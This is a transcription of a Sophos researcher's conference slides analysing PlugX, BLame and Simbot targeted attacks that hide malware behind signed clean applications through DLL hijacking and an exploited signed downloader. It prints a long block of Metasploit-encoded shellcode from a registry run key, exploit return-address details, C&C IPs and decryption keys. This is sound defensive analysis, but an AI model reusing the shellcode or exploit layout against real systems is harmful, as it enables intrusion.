Hide and seek - how targeted attacks hide behind clean applications Szappanos Gábor

Similar documents
This report is a detailed analysis of the dropper and the payload of the HIMAN malware.

Malware Analysis Report

VISA SECURITY ALERT December 2015 KUHOOK POINT OF SALE MALWARE. Summary. Distribution and Installation

Redline Users Guide. Version 1.12

WHY ATTACKER TOOLSETS DO WHAT THEY DO

From Georgia, with Love Win32/Georbot. Is someone trying to spy on Georgians?

G DATA SECURITYLABS CASE STUDY OPERATION TOOHASH HOW TARGETED ATTACKS WORK

HP ProtectTools Embedded Security Guide

SecureVault Online Backup Service FAQ

Networking Best Practices Guide. Version 6.5

A perspective to incident response or another set of recommendations for malware authors

The Value of Physical Memory for Incident Response

Absolute Backdoor Revisited. Vitaliy Kamlyuk, Kaspersky Lab Sergey Belov, Kaspersky Lab Anibal Sacco, Cubica Labs

The Epic Turla Operation: Information on Command and Control Server infrastructure

Operation Liberpy : Keyloggers and information theft in Latin America

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 8 Desktop and Server OS Vulnerabilities

Protecting Your POS System from PoSeidon and Other Malware Attacks

A TrendLabs Report. 2Q Report on Targeted Attack Campaigns

Release Notes for Epilog for Windows Release Notes for Epilog for Windows v1.7/v1.8

Windows Operating Systems. Basic Security

STATISTICA VERSION 9 STATISTICA ENTERPRISE INSTALLATION INSTRUCTIONS FOR USE WITH TERMINAL SERVER

Understand Backup and Recovery Methods

RDM+ Desktop for Windows Getting Started Guide

System Management. What are my options for deploying System Management on remote computers?

Data Stored on a Windows Server Connected to a Network

AVG 8.5 Anti-Virus Network Edition

File Server Migration

Galaxy Software Addendum

Nobeltec TZ: Microsoft SQL Server problems

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

RIA SECURITY TECHNOLOGY

A Study on the Live Forensic Techniques for Anomaly Detection in User Terminals

BACKUP & RESTORE (FILE SYSTEM)

SonicWALL CDP 5.0 Microsoft Exchange User Mailbox Backup and Restore

SY system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.

Ransomware: Next-Generation Fake Antivirus

Penetration Testing with Kali Linux

ZeroAccess. James Wyke. SophosLabs UK

RSA Incident Response: An APT Case Study

FAQ. How does the new Big Bend Backup (powered by Keepit) work?

Selected Windows XP Troubleshooting Guide

5 Steps to Advanced Threat Protection

McAfee One Time Password

Lenovo Online Data Backup User Guide Version

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

Wharf T&T Cloud Backup Service User & Installation Guide

Detection of Data Hiding in Computer Forensics. About Your Presenter

DiskPulse DISK CHANGE MONITOR

VTLBackup4i. Backup your IBM i data to remote location automatically. Quick Reference and Tutorial. Version 02.00

Application Whitelisting - Extend your Security Arsenal? Mike Baldi Cyber Security Architect Honeywell Process Solutions

Web Security School Final Exam

The HeartBeat APT Campaign

Parasitics: The Next Generation. Vitaly Zaytsev Abhishek Karnik Joshua Phillips

Thick Client Application Security

CopyKittens Attack Group

FORENSIC ANALYSIS Aleš Padrta

A+ Guide to Software: Managing, Maintaining, and Troubleshooting, 5e. Chapter 3 Installing Windows

imagepress CR Server A7000 Powered by Creo Color Server Technology For the Canon imagepress C7000VP/C6000VP/ C6000

Zmanda Cloud Backup Frequently Asked Questions

Capture Pro Software FTP Server System Output

UniFinger Engine SDK Manual (sample) Version 3.0.0

Installation Instruction STATISTICA Enterprise Small Business

Published. Technical Bulletin: Use and Configuration of Quanterix Database Backup Scripts 1. PURPOSE 2. REFERENCES 3.

1 of 10 1/31/2014 4:08 PM

Guide to Securing Microsoft Windows 2000 Encrypting File System

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Avalanche Remote Control User Guide. Version 4.1.3

System Security Policy Management: Advanced Audit Tasks

How to hack VMware vcenter server in 60 seconds

Persist It Using and Abusing Microsoft s Fix It Patches

RES ONE Automation 2015 Task Overview

GFI White Paper PCI-DSS compliance and GFI Software products

Data Stored on a Windows Computer Connected to a Network

6WRUP:DWFK. Policies for Dedicated SQL Servers Group

AVG Internet Security Business Edition 2012

How to hack VMware vcenter server in 60 seconds

HOW TO CONFIGURE SQL SERVER REPORTING SERVICES IN ORDER TO DEPLOY REPORTING SERVICES REPORTS FOR DYNAMICS GP

Application Firewall Configuration Examples

E-Commerce: Designing And Creating An Online Store

To install Multifront you need to have familiarity with Internet Information Services (IIS), Microsoft.NET Framework and SQL Server 2008.

Installing and Trouble-Shooting SmartSystems

ilaw Installation Procedure

INFUSION BUSINESS SOFTWARE Installation and Upgrade Guide

ZENworks 11 Support Pack 4 Full Disk Encryption Agent Reference. May 2016

TrueEdit Remote Connection Brief

System Administration Training Guide. S100 Installation and Site Management

Kaseya 2. User Guide. Version 7.0. English

Walton Centre. Document History Date Version Author Changes 01/10/ A Cobain L Wyatt 31/03/ L Wyatt Update to procedure

Sophos Enterprise Console server to server migration guide. Product version: 5.1 Document date: June 2012

Managing and Maintaining a Microsoft Windows Server 2003 Environment

Vulnerability Assessment and Penetration Testing

Installation Instruction STATISTICA Enterprise Server

BACKITUP Online. Error Codes & Fixes

Lab 7 - Exploitation 1. NCS 430 Penetration Testing Lab 7 Sunday, March 29, 2015 John Salamy

CAPIX Job Scheduler User Guide

2. From a control perspective, the PRIMARY objective of classifying information assets is to:

ASEC REPORT VOL AhnLab Monthly Security Report SECURITY TREND - APRIL 2013

Using Salvage to recover accidently deleted or overwritten files

Medical Device Security Health Imaging Digital Capture. Security Assessment Report for the Kodak DryView 8150 Imager Release 1.0.

Transcription:

Hide and seek - how targeted attacks hide behind clean applications Szappanos Gábor Principal Malware Researcher 1

Honourable mentions: 2010. Stuxnet digitally signed drivers: stolen certificate June 2012. Flame/Wiper: MD5 collision attack + abused MS certificate October 2012. Adobe signed malware: compromised server January 2013. TURKTRUST certificate abuse March 2013. Bit9 signed malware: stolen certificate Certificated purchased by malware authors (Digital River, ) 2

Classification initiative 3

See if APT samples cluster by: Shellcode techniques Encryption of embedded EXE Generic detection of dropped malware Connected C&C domains System activity 4

Typical Plugx infection scenario 5

Decoy document 6

CVE-2012-0158 7

Stage 2 neighbourhood 8

Stage 2 two views 9

Stage 2 decoding (v. 3.0, 4.0) Encrypted EXE 10

RAR SFX dropper (v. 3.0, 4.0) Clean signed application Malware loader Encrypted payload 11

Stage 2 decoding (v. 6.0) 12

The final payload http://www.contextis.com/files/plugx_-_payload_extraction_march_2013_1.pdf Bytewise XOR + LZNT compression + LCG (Linear Congruential Generator) DLL file, MZ + PE header is overwritten with GULP marker 13

Backdoor functions Function name Disk KeyLog Nethood Netstat Option PortMap Process RegEdit Screen Service Shell SQL Telnet Functionaity Get drive information (type, free space) Enumerate files Create Directory Create/Modify file Copy/Delete/Move/Rename files Execute files Log keystrokes to file %ALLUSERSPROFILE%\SxS\NvSmart.hlp Enumerate shared network resources Set TCP connection state Enumerate UDP and TCP connections Lock workstation Logoff/Reboot/Shutdown workstation Display messagebox Perform port map Terminate process Enumerate processes and modules Get process and module information Enumerate/Create/Delete registry entries Capture screenshot Get service information Change service configuration Start service Control service Delete service Create remote shell List SQL drivers List SQL data sources Execute SQL command Create telnet connection 14

Simple components (v. 6.0) dw20.dll Stage 1 dropper Embedded EXE in overlay (0xa00) 2.tmp Stage 2 dropper Embedded: Sidebar.dll.doc Sidebar.dll Gadget.exe Gadget.exe Sidebar.dll Sidebar.dll.doc Dll search order hijacking: clean application loading malicious DLL Gadget.exe (trusted process) Sidebar.dll (loader) Sidebar.dll.doc (final payload) 15

Digitally signed clean loaders 16

DLL search order hijacking elsewhere Tusmed (Plugx spinoff project) opayload dropped to %WINDOWS%\ ntshrui.dll, loaded by explorer.exe opayload dropped to %WINDOWS%\wdmaud.drv, loaded by explorer.exe Icefog o Payload dropped to %WINDOWS%\wdmaud.drv, loaded by explorer.exe Yaludle o Payload dropped to %WINDOWS%\msacm32.drv, loaded by explorer.exe Plugx copycat 17

BLame (a.k.a. Mgbot, Mgmbot) 18

Decoy document 19

CVE-2012-0158 Seen in China, Myanmar, Korea Encrypted Excel workbook with hardcoded default password: o http://nakedsecurity.sophos.com/2013/04/11/password-excel-velvet-sweatshop/ VelvetSweatshop 20

Shellcode anti-tracing trick 21

Shellcode anti-tracing trick 22

Encrypted appended EXE XOR (1 byte running key) + XOR (one byte fixed key) Dropped to %TEMP%\Winword.exe 23

Installation flow Shellcode in exploited document Embedded EXE in OLE2 overlay Winword.exe: temporary dropper Embedded: final payload backup installer rundll32 copy wscript copy AppMgmt.dll vbstdcomm.nls Odbc.txt Takes over an existing service: HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters --> ServiceDll 24

Main payload Compiled from the LAME MP3 encoder source (http://sourceforge.net/projects/lame) Some versions use UDT library (http://udt.sourceforge.net ) for communication Additional malware export(s) ASCII and Unicode string encrypted using DES ECB, decrypted on the fly, cleared after use o Key for ASCII strings: 82 C5 D3 59 2B 38 00 00 o Key for Unicode string: 5E 97 CC 42 8E CD 00 00 o Key for API function names: 5B 5F CB 8D E5 F5 00 00 C&C server names encrypted with bytewise XOR (0x58) Usual backdoor functions: o o o o o o Create screenshot Get drive type (FAT, FAT32, NTFS, CDFS) and free space Enumerate files and directories and send the list to the server Rename files Create directory Delete File 25

Main payload versions Version PE/LAME Timestamp Exports DES key count UDT present First seen Servers 2.2 19/10/2011 lame_set_out_sample lame_get_out_sample 3-08/04/2013 202.146.217.229 2.22 17/02/2012 lame_set_out_sample 3-31/05/2013 103.246.247.194 2.3(TCP) 19/03/2012 lame_set_out_sample 3-26/04/2013 forwork.my03.com 2.3(UDP) 06/06/2012 lame_set_out_sample 3 + 07/12/2012 113.10.201.254 goodnewspaper.gicp.net 1115.126.3.214 goodnewspaper.3322.org 2.4(UDP) 19/01/2013 lame_set_out_sample 2 + 06/05/2013 113.10.201.254 113.10.201.250 125.141.149.23 125.141.149.46 125.141.149.49 58.64.129.149 goodnewspaper.3322.org goodnewspaper.gicp.net 26

Informative string constants General operation: Client RecvData Complete A File Search Task has start already!!! File Search Task Success File Search Task Failed, Please Check Upload Client Failed Upload Client Success Delete File Success Delete File Failed Rename File Success Rename File Failed Create Folder Success Create Folder Failed Global\VMM1002 Undocumented functionality: X:\Windows\System32\rundll32.exe X:\Windows\msacm32.drv arp -s %s 11-11-11-11-11-11 2.4(UDP) Junk: lsjkl 27

Unused string constants Internal configuration: ASCII: 1a: kazafei 1b: 192.168.1.98 1c: 80 Junk: ASCII: 1f: # Undocumented functionality: ASCII: 1d: MagicMutex Unicode: 15: D:\Resume.dll 16: D:\delete.dll 17: D:\delete2.dll Unicode: 7: WINSTA0 14: AppMgmt 3a: @ 52: Start 28

Simbot 29

CVE-2012-0158 Encrypted Excel workbook with hardcoded default password: o http://nakedsecurity.sophos.com/2013/04/11/password-excel-velvet-sweatshop/ VelvetSweatshop 30

Multi-staged shellcode dropper 31

Installation flow Shellcode in exploited document First stage dropper Intermediate dropped Installer Embedded EXE in OLE2 overlay Embedded plain EXE Embedded encrypted EXE Embedded encrypted components Science.exe Registered for startup HKLM\SYSTEM\CurrentControlSet\Services\NetWork Service\ImagePath Added to the DEP exclusion list sysdm.cpl -> NoExecuteAddFileOptOutList 32

Run key HKLM\SYSTEM\CurrentControlSet\Services\NetWork Service\ImagePath = C:\Documents and Settings\All Users\NetWork\science.exe LLLLYIIII7QZAkA0D2A00A0kA0D2A12B10B1ABjAX8A1uIN2uNkXlMQJLePvbUPePJgW59t7kwOKDSPJgg5hh2ZezxFVXJg75xlrebuXbtKyWqUXp5FKfZvYPKwpEzTm7xosdLUO7w5zXLnN0dVNKO72eKLYKJs 3ROEucKypdnkgEVP5PgpUPLKRVtLLKT6ELLKw6WxlKQnwPLKp6u6vYPOr8RUzRnkyHlKRs7LNkpTvzt8wsxSlIqEYLlK1bQ0wsZSNkSzFxVSjrk9aEkhcfrqLKsen8NmQmXdlMulNwwCJrkLnM5SO3rrpVvSZrNkxpVSiPKLnLlDKpptEWKqYR334rN0XkHtLKy RQNBzgK370t7t72xbklJlNkw5klLK3xuteSxKQvNkTTRqnkG8wlESjkNks4J1wsISk9VgKN75JxOpsMxX7vpYaNqnlkPj60lK9MnazKGpUQUPGpbsQzEPKOpUKTOuO0tOk4nQWpePUPlKzUmQJNePeQgpwpGsl0KMNLrFUmQL303DURzK8wKLiWSvfbQs born1vhg2fuvayswfnctkwpf4j3qptupwpbjc0phmpwpwp7pazusszupszs1phwpup7pmppsiosekxnczxkosdpllkjxsz7ppsko65jtmyquxlszw0sx30vps0s02p1zgpyosel8nekpoy0expptpmpj7pnmf5idf2iosexlv0qckov5xlle9pt4ekbsko se8plkcezpnkpmxlmqytupurepuplkm5qmp3iksyrqmzujp0wl7zxbkkbytskkcsk0kkkoruut5ckkzkzvvp5lvjxbjqnmk2tstl7pepf0crkokbysan2unkzlk1jlgpdbwpwpo73uktwkwoidu0iww5kx0z5zjftxo7rexlsu2um2tkxgbejp5fn6hvyp XG1Ul4M7XoRtZ5yW2ezXNNxP4VlkO73uilYKhSSR856SHIsTnkgE6PGpUPUPLKPvtLNkafWllKrfGxLKsNa0NkwFQvVYPODXPuXrLKkhlKPSgLlK646zT84ChSmYceKlNkqbepwshsLKPJ6xFSkbmYQEzxpVv1Nk2uN8LMcMHdLM5lLWp39BKLlmTCXCf2SfP 38RLKzPecyPKLllLDiP2TEWiQO2USvRzphk8tLKKrCnBzwKVg3DwtaRM2KlzlnkG5KlNksxUtfcxKPfnkwdPQNkRhWleSJklKVdNqC3hCNi4GkNpEjxMPqmZx7vSiSnSNnKbJV0lKyMmQjK7p7q5PgpPS2J7pioF5ytMUYPFoLDoRGpwp5PLKL5k1zNuPFa7p Wp7sxpymLl56wMQLePRTWrxkKGYl9WPFWr2CBORNE6HGQVVf1ybGTnPdO7qVfjaqT4UPS0azgpSXk0WpgpUPSZuSqzWppj31qxuPePuPmPPSioseKXMSKHKOPtaMLKKhrJ5PqCKOpUjTMYCuhLsZ3pQx7p4PWp7prprJUPioceHxK5KpmYW5ZpQd WNsZUPLM3ekdPRkOBUzlpP63kORuxlneIPbT4lpSKOv58pLKPUN0Nk2m8LnaYTuPs2WpGpNkkUsmecKkQYSamZuJP0wl4JkRkKCidsIKNmMRuC4L30s02pW2kOhRYSD2A00A0kA0D2A12B10B1ABjAX8A1uIN2unkZLk1jLGpdBWpwpo73uKTWkwOI du0iww5kx0z5zjftxo7rexlsu2um2tkxgbejp5fn6hvypxg1ul4m7xortz5yw2ezxnnxp4vlko73uilykhssr856shistnkge6pgpupuplkpvtlnkafwllkrfgxlksna0nkwfqvvypodxpuxrlkkhlkpsgllk646zt84chsmyceklnkqbepwshslkpj6xfskbmy QEzxpVv1Nk2uN8LMcMHdLM5lLWp39BKLlmTCXCf2SfP38RLKzPecyPKLllLDiP2TEWiQO2USvRzphk8tLKKrCnBzwKVg3DwtaRM2KlzlnkG5KlNksxUtfcxKPfnkwdPQNkRhWleSJklKVdNqC3hCNi4GkNpEjxMPqmZx7vSiSnSNnKbJV0lKyMmQjK7p7q5Pg pps2j7piof5ytmuypfoldorgpwp5plkl5k1znupfa7pwp7sxpymll56wmqleprtwrxkkgyl9wpfwr2cborne6hgqvvf1ybgtnpdo7qvfjaqt4ups0azgpsxk0wpgpupszusqzwppj31qxupepupmppsiosekxmskhkoptamlkkhrj5pqckopujtmy CuhLsZ3pQx7p4PWp7prprJUPioceHxK5KpmYW5ZpQdWNsZUPLM3ekdPRkOBUzlpP63kORuxlneIPbT4lpSKOv58pLKPUN0Nk2m8LnaYTuPs2WpGpNkkUsmecKkQYSamZuJP0wl4JkRkKCidsIKNmMRuC4L30s02pW2kOhRYSD2A00A0kA0D2A12B10 B1ABjAX8A1uIN2unkZLk1jLGpdBWpwpo73uKTWkwOIdU0iWW5kX0z5zjfTxO7rexlsu2uM2TKxGbejP5Fn6HVyPXG1Ul4M7XoRtZ5yW2ezXNNxP4VlkO73uilYKhSSR856SHIsTnkgE6PGpUPUPLKPvtLNkafWllKrfGxLKsNa0NkwFQvVYPODXPuXrLKkhlK PSgLlK646zT84ChSmYceKlNkqbepwshsLKPJ6xFSkbmYQEzxpVv1Nk2uN8LMcMHdLM5lLWp39BKLlmTCXCf2SfP38RLKzPecyPKLllLDiP2TEWiQO2USvRzphk8tLKKrCnBzwKVg3DwtaRM2KlzlnkG5KlNksxUtfcxKPfnkwdPQNkRhWleSJklKVdNqC3hCNi 4GkNpEjxMPqmZx7vSiSnSNnKbJV0lKyMmQjK7p7q5PgpPS2J7pioF5ytMUYPFoLDoRGpwp5PLKL5k1zNuPFa7pWp7sxpymLl56wMQLePRTWrxkKGYl9WPFWr2CBORNE6HGQVVf1ybGTnPdO7qVfjaqT4UPS0azgpSXk0WpgpUPSZuSqzWppj31qxuPe PuPmPPSioseKXMSKHKOPtaMLKKhrJ5PqCKOpUjTMYCuhLsZ3pQx7p4PWp7prprJUPioceHxK5KpmYW5ZpQdWNsZUPLM3ekdPRkOBUzlpP63kORuxlneIPbT4lpSKOv58pLKPUN0Nk2m8LnaYTuPs2WpGpNkkUsmecKkQYSamZuJP0wl4JkRkKCidsIK NmMRuC4L30s02pW2kOhRYSD2A00A0kA0D2A12B10B1ABjAX8A1uIN2unkZLk1jLGpdBWpwpo73uKTWkwOIdU0iWW5kX0z5zjfTxO7rexlsu2uM2TKxGbejP5Fn6HVyPXG1Ul4M7XoRtZ5yW2ezXNNxP4VlkO73uilYKhSSR856SHIsTnkgE6PGpUPUPL KPvtLNkafWllKrfGxLKsNa0NkwFQvVYPODXPuXrLKkhlKPSgLlK646zT84ChSmYceKlNkqbepwshsLKPJ6xFSkbmYQEzxpVv1Nk2uN8LMcMHdLM5lLWp39BKLlmTCXCf2SfP38RLKzPecyPKLllLDiP2TEWiQO2USvRzphk8tLKKrCnBzwKVg3DwtaRM2Klzlnk G5KlNksxUtfcxKPfnkwdPQNkRhWleSJklKVdNqC3hCNi4GkNpEjxMPqmZx7vSiSnSNnKbJV0lKyMmQjK7p7q5PgpPS2J7pioF5ytMUYPFoLDoRGpwp5PLKL5k1zNuPFa7pWp7sxpymLl56wMQLePRTWrxkKGYl9WPFWr2CBORNE6HGQVVf1ybGTnPdO 7qVfjaqT4UPS0azgpSXk0WpgpUPSZuSqzWppj31qxuPePuPmPPSioseKXMSKHKOPtaMLKKhrJ5PqCKOpUjTMYCuhLsZ3pQx7p4PWp7prprJUPioceHxK5KpmYW5ZpQdWNsZUPLM3ekdPRkOBUzlpP63kORuxlneIPbT4lpSKOv58pLKPUN0Nk2m8LnaY TuPs2WpGpNkkUsmecKkQYSamZuJP0wlD2A00A0kA0D2A12B10B1ABjAX8A1uIN2unkZLk1jLGpdBWpwpo73uKTWkwOIdU0iWW5kX0z5zjfTxO7rexlsu2uM2TKxGbejP5Fn6HVyPXG1Ul4M7XoRtZ5yW2ezXNNxP4VlkO73uilYKhSSR856SHIsTnkgE6P GpUPUPLKPvtLNkafWllKrfGxLKsNa0NkwFQvVYPODXPuXrLKkhlKPSgLlK646zT84ChSmYceKlNkqbepwshsLKPJ6xFSkbmYQEzxpVv1Nk2uN8LMcMHdLM5lLWp39BKLlmTCXCf2SfP38RLKzPecyPKLllLDiP2TEWiQO2USvRzphk8tLKKrCnBzwKVg3Dwta RM2KlzlnkG5KlNksxUtfcxKPfnkwdPQNkRhWleSJklKVdNqC3hCNi4GkNpEjxMPqmZx7vSiSnSNnKbJV0lKyMmQjK7p7q5PgpPS2J7pioF5ytMUYPFoLDoRGpwp5PLKL5k1zNuPFa7pWp7sxpymLl56wMQLePRTWrxkKGYl9WPFWr2CBORNE6HGQVVf1y bgtnpdo7qvfjaqt4ups0azgpsxk0wpgpupszusqzwppj31qxupepupmppsiosekxmskhkoptamlkkhrj5pqckopujtmycuhlsz3pqx7p4pwp7prprjupiocehxk5kpmyw5zpqdwnszuplm3ekdprkobuzlpp63koruxlneipbt4lpskov58plkpun0n k2m8lnaytups2wpgpnkkusmeckkqysamzujp0wl4jkrkkcidsiknmmruc4l30s02pw2kohrysd2a00a0ka0d2a12b10b1abjax8a1uin2unkzlk1jlgpdbwpwpo73uktwkwoidu0iww5kx0z5zjftxo7rexlsu2um2tkxgbejp5fn6hvypxg1ul4m7x ortz5yw2ezxnnxp4vlko73uilykhssr856shistnkge6pgpupuplkpvtlnkafwllkrfgxlksna0nkwfqvvypodxpuxrlkkhlkpsgllk646zt84chsmyceklnkqbepwshslkpj6xfskbmyqezxpvv1nk2un8lmcmhdlm5llwp39bkllmtcxcf2sfp38rlkzpecy PKLllLDiP2TEWiQO2USvRzphk8tLKKrCnBzwKVg3DwtaRM2KlzlnkG5KlNksxUtfcxKPfnkwdPQNkRhWleSJklKVdNqC3hCNi4GkNpEjxMPqmZx7vSiSnSNnKbJV0lKyMmQjK7p7q5PgpPS2J7pioF5ytMUYPFoLDoRGpwp5PLKL5k1zNuPFa7pWp7sxpymLl 56wMQLePRTWrxkKGYl9WPFWr2CBORNE6HGQVVf1ybGTnPdO7qVfjaqT4UPS0azgpSXk0WpgpUPSZuSqzWppj31qxuPePuPmPPSioseKXMSKHKOPtaMLKKhrJ5PqCKOpUjTMYCuhLsZ3pQx7p4PWp7prprJUPioceHxK5KpmYW5ZpQdWNsZUPLM3 ekdprkobuzlpp63koruxlneipbt4lpskov58plkpun0nk2m8lnaytups2wpgpnkkusmeckkqysamzujp0wl4jkrkkcidsiknmmruc4l30s02pw2kohrysd2a00a0ka0d2a12b10b1abjax8a1uin2unkzlk1jlgpdbwpwpo73uktwkwoidu0iww5kx0 z5zjftxo7rexlsu2um2tkxgbejp5fn6hvypxg1ul4m7xortz5yw2ezxnnxp4vlko73uilykhssr856shistnkge6pgpupuplkpvtlnkafwllkrfgxlksna0nkwfqvvypodxpuxrlkkhlkpsgllk646zt84chsmyceklnkqbepwshslkpj6xfskbmyqezxpvv1nk2 un8lmcmhdlm5llwp39bkllmtcxcf2sfp38rlkzpecypklllldip2tewiqo2usvrzphk8tlkkrcnbzwkvg3dwtarm2klzlnkg5klnksxutfcxkpfnkwdpqnkrhwlesjklkvdnqc3hcni4gknpejxmpqmzx7vsisnsnnkbjv0lkymmqjk7p7q5pgpps2j7piof5y tmuypfoldorgpwp5plkl5k1znupfa7pwp7sxpymll56wmqleprtwrxkkgyl9wpfwr2cborne6hgqvvf1ybgtnpdo7qvfjaqt4ups0azgpsxk0wpgpupszusqzwppj31qxupepupmppsiosekxmskhkoptamlkkhrj5pqckopujtmycuhlsz3pqx7 p4pwp7prprjupiocehxk5kpmyw5zpqdwnszuplm3ekdprkobuzlpp63koruxlneipbt4lpskov58plkpun0nk2m8lnaytups2wpgpnkkusmeckkqysamzujp0wl4jkrkkcidsiknmmruc4l30s02pw2kohrysaaa4jkrkkcidsikd2a00a0ka0d2a12 B10B1ABjAX8A1uIN2unkZLk1jLGpdBWpwpo73uKTWkwOIdU0iWW5kX0z5zjfTxO7rexlsu2uM2TKxGbejP5Fn6HVyPXG1Ul4M7XoRtZ5yW2ezXNNxP4VlkO73uilYKhSSR856SHIsTnkgE6PGpUPUPLKPvtLNkafWllKrfGxLKsNa0NkwFQvVYPODXPuXrLK khlkpsgllk646zt84chsmyceklnkqbepwshslkpj6xfskbmyqezxpvv1nk2un8lmcmhdlm5llwp39bkllmtcxcf2sfp38rlkzpecypklllldip2tewiqo2usvrzphk8tlkkrcnbzwkvg3dwtarm2klzlnkg5klnksxutfcxkpfnkwdpqnkrhwlesjklkvdnqc3h CNi4GkNpEjxMPqmZx7vSiSnSNnKbJV0lKyMmQjK7p7q5PgpPS2J7pioF5ytMUYPFoLDoRGpwp5PLKL5k1zNuPFa7pWp7sxpymLl56wMQLePRTWrxkKGYl9WPFWr2CBORNE6HGQVVf1ybGTnPdO7qVfjaqT4UPS0azgpSXk0WpgpUPSZuSqzWppj31qx upepupmppsiosekxmskhkoptamlkkhrj5pqckopujtmycuhlsz3pqx7p4pwp7prprjupiocehxk5kpmyw5zpqdwnszuplm3ekdprkobuzlpp63koruxlneipbt4lpskov58plkpun0nk2m8lnaytups2wpgpnkkusmeckkqysamzujp0wl4jkrkkcid siknmmrd2a00a0ka0d2a12b10b1abjax8a1uin2unkzlk1jlgpdbwpwpo73uktwkwoidu0iww5kx0z5zjftxo7rexlsu2um2tkxgbejp5fn6hvypxg1ul4m7xortz5yw2ezxnnxp4vlko73uilykhssr856shistnkge6pgpupuplkpvtlnkafwllkrfgxl KsNa0NkwFQvVYPODXPuXrLKkhlKPSgLlK646zT84ChSmYceKlNkqbepwshsLKPJ6xFSkbmYQEzxpVv1Nk2uN8LMcMHdLM5lLWp39BKLlmTCXCf2SfP38RLKzPecyPKLllLDiP2TEWiQO2USvRzphk8tLKKrCnBzwKVg3DwtaRM2KlzlnkG5KlNksxUtfcxKPfn kwdpqnkrhwlesjklkvdnqc3hcni4gknpejxmpqmzx7vsisnsnnkbjv0lkymmqjk7p7q5pgpps2j7piof5ytmuypfoldorgpwp5plkl5k1znupfa7pwp7sxpymll56wmqleprtwrxkkgyl9wpfwr2cborne6hgqvvf1ybgtnpdo7qvfjaqt4ups0azgp SXk0WpgpUPSZuSqzWppj31qxuPePuPmPPSioseKXMSKHKOPtaMLKKhrJ5PqCKOpUjTMYCuhLsZ3pQx7p4PWp7prprJUPioceHxK5KpmYW5ZpQdWNsZUPLM3ekdPRkOBUzlpP63kORuxlneIPbT4lpSKOv58pLKPUN0Nk2m8LnaYTuPs2WpGpNkkUs meckkqysamzujp0wl4jkrkkcidsiknmmruc4l30s02pw2kohrysauc4l30s02pw2kohrd2a00a0ka0d2a12b10b1abjax8a1uin2unkzlk1jlgpdbwpwpo73uktwkwoidu0iww5kx0z5zjftxo7rexlsu2um2tkxgbejp5fn6hvypxg1ul4m7xortz5y W2ezXNNxP4VlkO73uilYKhSSR856SHIsTnkgE6PGpUPUPLKPvtLNkafWllKr 100 PC@ 33

Logging char *write_log(int a1, char *Format,...) Using vsprintf, here is no way to limit the number of characters written, which { means that code using this function is susceptible to buffer overruns. va_list va; // [sp+200ch] [bp+ch]@1 char *result; // eax@1 char Dest; // [sp+0h] [bp-2000h]@2 Use _vsnprintf instead, or call _vscprintf to determine how large a buffer is needed. va_start(va, Format); result = Format; if ( Format ) { result = (char *)vsprintf(&dest, Format, va); if ( (unsigned int)result < 0x2000 ) result = (char *)CLog ADD_Log(g_Log, &Dest, result, a1); } return result; } 34

Exploitation Log function epilogue: add esp, 2000h retn 0x404350 return address (PC@) Param 1: log entry ID Param 2: address of command line.text:00404350 pop ecx.text:00404351 retn Param 1: log entry ID Param 2: address of command line LLLLYIIII7QZAkA0D2A00A0kA0D2A12B10B1ABjAX8A1uIN 2uNkXlMQJLePvbUPePJgW59t7kwOKDSPJgg5hh2ZezxFVX Jg75xlrebuXbtKyWqUXp5FKfZvYPKwpEzTm7xosdLUO7w5 zxlnn0dvnko72eklykjs3 35

Shellcode from the command line Encrypted using alpha_mixed from Metasploit Unusual API resolver (SHL(3) + XOR) Decrypts and loads the main payload file (Config.dat) 36

Main payload Decrypted and loaded in-memory Connects to 59.188.23.121 (port 8001 or 8433 ) Communication is zlib compressed Loads config from o HKLM\SOFTWARE\Microsoft\Windows\Help -> Config o file %ALLUSERSPROFILE%\NetWork\t1.dat 37

Exploited application Downloader component 4 different variations identified All 4 are vulnerable to the exploit All have the same version info o Verified: Signed o Signing date: 07:20 23/02/2012 o Publisher: o Description: DownLoad Microsoft??????? o Product: DownLoad???? o Version: 1, 0, 0, 1 o File version: 10, 3, 19, 1 38

Installation flow Shellcode in exploited document First stage dropper Intermediate dropped Installer Embedded EXE in OLE2 overlay Embedded plain EXE Embedded encrypted EXE Embedded encrypted components Science.exe (trusted process) DDVCtrlLib.dll DDVEC.dll (clean libraries) Config.dat (final payload) 39

Conclusion Not every that looks clean, acts as clean or is clean is innocent. 40

Questions? gabor.szappanos@sophos.com Sophos Ltd. All rights reserved. 41

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information